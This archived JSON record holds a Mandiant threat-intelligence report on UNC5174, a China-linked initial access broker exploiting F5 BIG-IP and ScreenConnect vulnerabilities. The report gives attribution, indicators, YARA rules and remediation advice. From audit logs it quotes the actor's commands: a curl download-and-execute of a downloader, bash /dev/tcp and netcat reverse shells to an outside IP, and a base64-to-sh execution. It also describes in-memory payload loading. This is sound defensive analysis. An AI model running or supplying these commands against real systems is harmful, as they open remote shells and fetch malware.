{
	"id": "9f64b195-3d9c-47ab-8a6e-5ead3b0fb490",
	"created_at": "2026-04-06T00:07:01.836524Z",
	"updated_at": "2026-04-10T13:12:11.133774Z",
	"deleted_at": null,
	"sha1_hash": "0b2af77c4267b832a0167558cda51d52f59b31e9",
	"title": "Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 899122,
	"plain_text": "Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP\r\n(CVE-2023-46747) and ScreenConnect\r\nBy Mandiant\r\nPublished: 2024-03-21 · Archived: 2026-04-05 17:59:01 UTC\r\nWritten by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen\r\nDuring the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation\r\nof CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we\r\nobserved exploitation of ConnectWise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom\r\ntooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be\r\nunique to a People's Republic of China (PRC) threat actor, UNC5174.\r\nMandiant assesses UNC5174 (believed to use the persona \"Uteus\") is a former member of Chinese hacktivist\r\ncollectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS)\r\nfocused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense\r\ncontractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747\r\nexploitation. In February 2024, UNC5174 was observed exploiting ConnectWise ScreenConnect\r\nvulnerability (CVE-2024-1709) to compromise hundreds of institutions primarily in the U.S. and Canada.\r\nTargeting and Timeline\r\nUNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research\r\nand education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and\r\nU.S. and UK government organizations during October and November 2023, as well as in February 2024.\r\nThe actor appears primarily focused on executing access operations. 
Mandiant observed UNC5174 exploiting\r\nvarious vulnerabilities during this time.\r\nConnectWise ScreenConnect Vulnerability CVE-2024-1709\r\nF5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747\r\nAtlassian Confluence CVE-2023-22518\r\nLinux Kernel Exploit CVE-2022-0185\r\nZyxel Firewall OS Command Injection Vulnerability CVE-2022-30525\r\nInvestigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command\r\nhistory. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive\r\nscanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania,\r\nand Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified;\r\nhowever, Mandiant does not have significant evidence to determine successful exploitation of these targets.\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 1 of 16\n\nFigure 1: UNC5174 global targeting map\r\nInitial Disclosure of CVE-2023-46747\r\nOn Oct. 25, 2023, Praetorian published an advisory and proof-of-concept (PoC) for a zero-day (0-day)\r\nvulnerability (CVE-2023-46747) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This\r\nvulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating\r\nsystem as the root user. The blog post also detailed steps required for successful exploitation, involving Apache\r\nJServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute\r\nbash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a\r\nsecurity advisory on Oct. 27, 2023. The advisory detailed the affected F5 appliance versions and provided a script\r\nfor mitigating the vulnerability. 
Mandiant strongly recommends organizations apply the mitigation script to\r\nvulnerable F5 BIG-IP appliances and investigate for evidence of compromise.\r\nEvidence of Exploitation\r\nMandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative\r\nuser account creation and execution of bash commands via the TMSH. Through investigation it became apparent\r\nthat UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The\r\nanomalous behavior appeared first in the \"/var/log/audit\" log file, which recorded evidence of the creation of new\r\nadmin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also\r\nresulted in the creation of the same new user account on the underlying operating system, including the following\r\nentries:\r\n/etc/passwd\r\n/etc/shadow\r\nThe creation of the user's home directory was also replicated at /home/\u003cusername\u003e.\r\nOct 28 01:52:32 localhost.localdomain notice tmsh[30629]:\r\n01420002:5: AUDIT - pid=30629 user=root folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=create\r\nauth user f5support3 password **** shell bash partition-access\r\nadd { all-partitions { role admin } }\r\nOct 28 01:53:29 localhost.localdomain notice icrd_child[18778]:\r\n01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=run util bash -c id\r\nTable 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.\r\nThe \"/var/log/restjavad-audit.log\" recorded evidence of malicious requests to the REST API, including user\r\naccount, HTTP request method, API endpoint, and source IP address. 
In the following example, UNC5174\r\nauthenticated and executed bash commands on the underlying operating system as the newly created user\r\n\"f5support3\". The following log entries show the f5support3 user executing bash commands. The body of the\r\nPOST request contains the bash command being executed.\r\n[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker]\r\n{\"user\":\"local/f5support3\",\"method\":\"POST\",\"uri\":\"http://localhost:8100\r\n/mgmt/tm/util/bash\",\"status\":200,\"from\":\"154.12.177[.]8\"}\r\n[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker]\r\n{\"user\":\"local/f5support3\",\"method\":\"PATCH\",\"uri\":\"http://localhost:8100\r\n/mgmt/shared/authz/users/f5support3\",\"status\":200,\"from\":\"154.12.177[.]8\"}\r\nTable 2: UNC5174 bash commands with newly created username f5support3\r\nUNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user\r\naccounts, including:\r\nF5support3\r\nF5_admin\r\nf5_support\r\nPost-Exploitation Tactics by UNC5174 After Successful Account Creation\r\nSNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL\r\nUNC5174 leveraged their newly minted TMSH access to download and execute \"/tmp/watchsys\" using a cURL\r\ncommand. Mandiant's analysis of the file \"/tmp/watchsys\" identified it as a new 64-bit ELF downloader we have\r\nnamed SNOWLIGHT.\r\nThe following chained bash commands attributed to UNC5174 perform the following actions related to\r\nSNOWLIGHT:\r\n1. Delete any file previously written to /tmp/watchsys.\r\n2. Forcefully kill the process \"watchsys\" if it is running.\r\n3. Download the file from a remote URL to /tmp/watchsys.\r\n4. Modify the permissions of /tmp/watchsys to allow execution.\r\n5. Execute /tmp/watchsys using \"nohup\", so that the process will continue executing after the parent process\r\nis terminated.\r\n6. 
Perform a directory listing of the /tmp directory.\r\nNov 2 07:29:47 localhost.localdomain notice icrd_child[17602]:\r\n01420002:5: AUDIT - pid=17602 user=admin folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=run util bash\r\n-c \"rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys\r\nhttp://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup\r\n/tmp/watchsys \u0026;ls -al /tmp/\"\r\nTable 3: UNC5174 cURL command to download SNOWLIGHT downloader\r\nFigure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method\r\nSNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw\r\nsockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with\r\nthe command-and-control (C2 or C\u0026C) server, though one variant has been observed using a fake HTTP header\r\nfor an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is\r\ndownloaded and XOR decoded using the key \"0x99\".\r\nFinally, the decoded secondary ELF file is loaded into memory using Linux's \"sys_memfd_create\" and executed\r\nvia \"fexecve\". The payload is downloaded directly into memory and executed without ever being written to disk.\r\nIn the SNOWLIGHT variants we observed, the payload's process will run under the hard-coded name of \"a\". This is\r\nidentifiable in a running process list as a \"memfd\" process.\r\nThe SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that\r\nMandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is\r\nthen executed in-memory via the previously described memfd method. 
The resultant GOHEAVY process-related\r\nartifacts were observed on the compromised F5 appliance:\r\nProcess Name: memfd:a (deleted)\r\nPath: empty (due to the executable being un-backed)\r\nArgs: ?\r\nUser: root\r\nGOREVERSE is a publicly available reverse shell backdoor written in Go that operates over Secure Shell\r\n(SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously\r\nobserved hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published\r\non GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL.\r\nMandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back\r\nto the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.\r\nNov 2 07:16:15 localhost.localdomain notice icrd_child[18778]:\r\n01420002:5: AUDIT - pid=18778 user=admin folder=\r\n/Common module=(tmos)# status=[Command OK] cmd_data=run util\r\nbash -c \"bash -i /dev/tcp/172.104.124[.]74/443 0\u003e\u00261 \u0026\"|\r\nTable 4: UNC5174 command to launch a bash reverse shell\r\nNov 2 07:30:37 localhost.localdomain notice icrd_child[18778]:\r\n01420002:5: AUDIT - pid=18778 user=admin folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=run util bash\r\n-c \"nc 172.104.124[.]74 443 -e /bin/bash \u0026\"\r\nTable 5: UNC5174 command to launch a netcat reverse shell\r\nInternal Reconnaissance\r\nShell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor\r\ndownloading the file \"/tmp/ss\" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads,\r\nas well as GitHub, using the cURL command.\r\ncurl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx\r\ncurl -o /tmp/ss 
hxxps://github[.]com/1n7erface/Template/releases\r\n/download/v1.2.5/App-amd64linux-noupx\r\nTable 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance\r\nfunctionality\r\nThe file \"/tmp/ss\" was not recoverable at the time of analysis; however, the GitHub URL resource\r\nhttps://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with\r\nChinese-language instructions. Execution of \"/tmp/ss\" was recorded in shell history, and command-line arguments\r\nindicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool\r\nFSCAN.\r\n./ss -i \u003cInternal CIDR block\u003e\r\nTable 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances\r\nGOHEAVY Tunneler: A Closer Look\r\nUNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added\r\nstealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed\r\nGOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL\r\nadministrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY\r\ncontinuously broadcasts the string \"SpotUdp\" to existing network interfaces.\r\nThis behavior suggests the tool's purpose lies in establishing covert communication channels and potentially\r\nfacilitating lateral movement within compromised networks. 
The continuous \"SpotUdp\" broadcast might serve as\r\na beacon for identifying other compromised machines running GOHEAVY within the same network.\r\nIn addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming,\r\nincluding:\r\nSLIVER client\r\nFFUFP\r\nSQLMAP\r\nDIRBUSTER\r\nMETASPLOIT\r\nAFROG penetration testing tool\r\nNUCLEI vulnerability scanning templates\r\nUNC5174 Closes the Door Behind Them\r\nMandiant observed an unusual behavior by UNC5174 following their initial access on the compromised\r\nappliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-\r\nprovided mitigation script \"mitigation.sh\". Mandiant assesses that this was an attempt to limit subsequent\r\nexploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional\r\ncommands were observed during their initial access on the compromised appliance:\r\nbash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73\r\n28/10 14:16:23 deleted user root6\r\n28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u\r\n4/11/2023 03:36:30 /tmp/.del\r\nUNC5174 Targets ScreenConnect Vulnerability\r\nOn Feb. 21, 2024, the actor \"uteus\" claimed in forum postings to have successfully exploited the vulnerability\r\nCVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally,\r\nprimarily in the U.S. and Canada.\r\nMandiant obtained the output of the actor's exploit, which showed the actor added the admin user \"cvetest\" to\r\nScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors\r\nsimilarly adding admin accounts at multiple victim organizations. 
Mandiant was also able to confirm the\r\ncompromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus\r\npersona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus\r\nwere also compromised.\r\nFigure 3: Geographic distribution of UNC5174 ScreenConnect targeting\r\nAttribution\r\nMandiant has identified a new access operations group UNC5174 that uses the persona \"Uteus\" (alternate\r\nspelling \"uetus\") on underground forums, which we assess with moderate confidence operates from China.\r\nUNC5174 was linked with several hacktivist collectives including \"Dawn Calvary\" and \"Genesis Day\" prior to\r\n2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who\r\nconducts for-profit intrusions.\r\nChinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors\r\nMandiant assesses UNC5174 (aka Uteus) was previously a member of the Chinese hacktivist collective \"Dawn\r\nCalvary\" and has collaborated with \"Genesis Day\" / \"Xiaoqiying\" and \"Teng Snake.\" This individual appears to\r\nhave departed these groups in mid-2023 and has since focused on executing access operations with the intention\r\nof brokering access to compromised environments.\r\nAs part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access\r\nbroker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing\r\nof an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174,\r\nincluding U.S. defense and UK government entities, were targeted concurrently by a distinct known MSS access\r\nbroker, UNC302, which was previously indicted by the U.S. Department of Justice in 2020.\r\nOn Oct. 
10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address\r\nof several government entities. This activity was associated with the UNC5174 pseudonym \"Uteus\", which shared\r\nthis purported access to a U.S. military contractor and UK government organization in an online communication.\r\nThe same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in\r\ncommunications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515.\r\nDetails of the intrusion were discovered within communications on a dark web forum. The Uteus persona\r\nindicated they had utilized a public proof of concept to perform activities on compromised systems. Notably,\r\nUteus is believed to be distinct from the entity \"Xiaoqiying,\" which has independently claimed to not be employed\r\nby the Chinese Government in a Telegram channel operated by the group.\r\nFigure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government\r\nBased on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access\r\nbroker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections\r\ncannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302,\r\nwhich suggests they operate within an MSS initial access broker landscape. 
These similarities suggest possible\r\nshared exploits and operational priorities between these threat actors, although further investigation is required for\r\ndefinitive attribution.\r\nOutlook and Implications\r\nUNC5174's exploitation of CVE-2023-46747 as an N-day vulnerability in tandem with recent exploitation of\r\nConnectWise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized\r\napproach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to\r\nconduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable\r\nespionage operations at scale. These operations often include rapid exploitation of recently disclosed\r\nvulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate\r\nwithin this model, and their operations provide insight into the initial access broker ecosystem leveraged by the\r\nMSS to target strategically interesting global organizations. 
Mandiant believes that UNC5174 will continue to\r\npose a threat to organizations in the academic, NGO, and government sectors specifically in the United States,\r\nCanada, Southeast Asia, Hong Kong, and the United Kingdom.\r\nRemediation and Hardening\r\nMandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:\r\nRestrict access to the F5 TMUI from the internet.\r\nImmediately apply the F5 mitigation script published in [K000137353] to any vulnerable F5 appliances.\r\nInvestigate vulnerable F5 appliances for evidence of compromise.\r\nIn the event of F5 compromise:\r\nReview appliance configurations for unauthorized modifications.\r\nReview file system and operating system (OS) artifacts for evidence of privileged account creation and\r\nremove any unauthorized accounts.\r\nConsider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that\r\nmay have been accessible to a threat actor.\r\nFor impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises\r\ncontroller read our latest ScreenConnect remediation and hardening guide.\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nIP Address ASN NetBlock Location\r\n118.140.151[.]242  9304 HGC Global Communications Limited (HK)\r\n61.239.68[.]73  9269 Hong Kong Broadband Network Ltd. 
(HK)\r\n172.245.68[.]110 36352  Colocrossing (U.S.)\r\nURLs\r\nURL Description\r\nhttp://172.245.68[.]110:8888  SUPERSHELL C2\r\nHost IOCs\r\nMD5 Hash Filename Type Code Family\r\nc867881c56698f938b4e8edafe76a09b LG ELF SNOWLIGHT\r\ndf4603548b10211f0aa77d0e9a172438 N/A ELF SNOWLIGHT\r\n0951109dd1be0d84a33d52c135ba9c97 N/A ELF SNOWLIGHT\r\n9c3bf506dd19c08c0ed3af9c1708a770 memfd:a ELF N/A\r\n0ba435460fb7622344eec28063274b8a undefined ELF SNOWLIGHT\r\na78bf3d16349eba86719539ee8ef562d N/A ELF SNOWLIGHT\r\nHost Based Indicators (Commands)\r\ncmd_data=run util bash -c \"echo\r\ndG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc=\r\n| base64 -d | sh\" \"tmsh -q -c 'cd /;show running-config recursive'\"\r\nrun util bash -c \"bash -i /dev/tcp/172.104.124.74/443 0\u003e\u00261 \u0026\"\r\nDetections\r\nrule M_Backdoor_GOREVERSE_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect events related to goreverse. GOREVERSE is a publicly available reverse shell\"\r\n md5 = \"5c175ea3664279d6c0c2609844de6949\"\r\n platforms = \"Windows,Linux,MacOS\"\r\n malware_family = \"GOREVERSE\"\r\n strings:\r\n $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 
48 8B\r\n[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }\r\n $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48\r\n8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }\r\n $cc_rssh = \"rssh\" fullword\r\n $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01\r\n[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }\r\n $str1 = \"--[foreground|fingerprint|proxy|process_name] -d|--destination \u003cserver_address\u003e\"\r\n $str2 = \"-d or --destination Server connect back address (can be baked in)\"\r\n $str3 = \"--foreground Causes the client to run without forking to background\"\r\n $str4 = \"--fingerprint Server public key SHA256 hex fingerprint for auth\"\r\n $str5 = \"--proxy Location of HTTP connect proxy to use\"\r\n $str6 = \"--process_name Process name shown in tasklist/process list\"\r\n condition:\r\n ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface)\r\nor (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0)\r\n== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d\r\nand uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f))\r\nand (all of ($str*) or all of ($cc_*))\r\n}\r\nrule M_APT_Downloader_SNOWLIGHT_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect the SNOWLIGHT code family\"\r\n md5 = \"0951109dd1be0d84a33d52c135ba9c97\"\r\n platforms = \"Linux\"\r\n malware_family = \"SNOWLIGHT\"\r\n strings:\r\n $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6\r\n7C F2 48 63 D2 48 89 EE 44 89 E7 }\r\n $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40\r\n00 BF 3F 01 00 00 E8 8C FE FF FF }\r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID 
Name\r\nA106-917 Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation\r\nA106-916 Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication\r\nA107-059 Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1\r\nA107-056 Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1\r\nMITRE ATT\u0026CK\r\nMandiant has observed UNC5174 use the following techniques:\r\nInitial Access T1190 Exploit Public-Facing Application\r\nDefense Evasion T1027 Obfuscated Files or Information\r\n  T1070.004 File Deletion\r\n  T1140 Deobfuscate/Decode Files or Information\r\n  T1222.002 Linux and Mac File and Directory Permissions Modification\r\n  T1601.001 Patch System Image\r\nDiscovery T1016 System Network Configuration Discovery\r\n  T1049 System Network Connections Discovery\r\n  T1082 System Information Discovery\r\n  T1083 File and Directory Discovery\r\nCommand and Control T1095 Non-Application Layer Protocol\r\n  T1105 Ingress Tool Transfer\r\n  T1572 Protocol Tunneling\r\n  T1573.002 Asymmetric Cryptography\r\nExecution T1059 Command and Scripting Interpreter\r\n  T1059.004 Unix Shell\r\nPersistence T1136.001 Local Account\r\nImpact T1531 Account Access Removal\r\nCredential Access T1003.008 /etc/passwd and /etc/shadow\r\nResource Development T1608.003 Install Digital Certificate\r\nMandiant has observed UNC302 use the following techniques:\r\nInitial Access T1133 External Remote Services\r\n  T1189 Drive-by Compromise\r\n  T1190 Exploit Public-Facing Application\r\nCollection T1213 Data from Information Repositories\r\n  T1560 Archive Collected Data\r\n  T1560.001 Archive via Utility\r\nPersistence T1505.003 Web Shell\r\nDefense Evasion T1027 Obfuscated Files or Information\r\n  T1036 
Masquerading\r\n  T1070.004 File Deletion\r\n  T1112 Modify Registry\r\n  T1134 Access Token Manipulation\r\n  T1497 Virtualization/Sandbox Evasion\r\nImpact T1529 System Shutdown/Reboot\r\nExecution T1059.003 Windows Command Shell\r\n  T1059.005 Visual Basic\r\n  T1203 Exploitation for Client Execution\r\nDiscovery T1012 Query Registry\r\n  T1016 System Network Configuration Discovery\r\n  T1057 Process Discovery\r\n  T1082 System Information Discovery\r\n  T1083 File and Directory Discovery\r\n  T1518 Software Discovery\r\nCredential Access T1003 OS Credential Dumping\r\nLateral Movement T1021.001 Remote Desktop Protocol\r\nResource Development T1583.003 Virtual Private Server\r\n  T1584 Compromise Infrastructure\r\nCommand and Control T1071.001 Web Protocols\r\n  T1071.004 DNS\r\n  T1095 Non-Application Layer Protocol\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect"
	],
	"report_names": [
		"initial-access-brokers-exploit-f5-screenconnect"
	],
	"threat_actors": [
		{
			"id": "4fd2e187-fea2-421a-870c-11be83231fd5",
			"created_at": "2023-11-04T02:00:07.652728Z",
			"updated_at": "2026-04-10T02:00:03.384073Z",
			"deleted_at": null,
			"main_name": "Xiaoqiying",
			"aliases": [
				"Genesis Day",
				"Teng Snake"
			],
			"source_name": "MISPGALAXY:Xiaoqiying",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8210e297-e5a7-4830-b7a3-1c8abc8e862f",
			"created_at": "2023-01-06T13:46:39.407579Z",
			"updated_at": "2026-04-10T02:00:03.316455Z",
			"deleted_at": null,
			"main_name": "BRONZE SPRING",
			"aliases": [
				"UNC302"
			],
			"source_name": "MISPGALAXY:BRONZE SPRING",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b302cfdb-30c9-4dce-a968-d2398dda820d",
			"created_at": "2024-03-28T02:00:05.789775Z",
			"updated_at": "2026-04-10T02:00:03.611467Z",
			"deleted_at": null,
			"main_name": "UNC5174",
			"aliases": [
				"Uteus"
			],
			"source_name": "MISPGALAXY:UNC5174",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9d5075e3-9fa3-40f8-9c2b-9cd1fc7a6ffe",
			"created_at": "2025-08-07T02:03:24.670367Z",
			"updated_at": "2026-04-10T02:00:03.801961Z",
			"deleted_at": null,
			"main_name": "BRONZE SPRING",
			"aliases": [
				"UNC302"
			],
			"source_name": "Secureworks:BRONZE SPRING",
			"tools": [
				"China Chopper",
				"Mimikatz",
				"OwaAuth"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132",
			"created_at": "2025-11-01T02:04:53.050049Z",
			"updated_at": "2026-04-10T02:00:03.774442Z",
			"deleted_at": null,
			"main_name": "BRONZE SNOWDROP",
			"aliases": [
				"UNC5174 "
			],
			"source_name": "Secureworks:BRONZE SNOWDROP",
			"tools": [
				"Metasploit",
				"SNOWLIGHT",
				"SUPERSHELL",
				"Sliver",
				"VShell"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434021,
	"ts_updated_at": 1775826731,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0b2af77c4267b832a0167558cda51d52f59b31e9.pdf",
		"text": "https://archive.orkl.eu/0b2af77c4267b832a0167558cda51d52f59b31e9.txt",
		"img": "https://archive.orkl.eu/0b2af77c4267b832a0167558cda51d52f59b31e9.jpg"
	}
}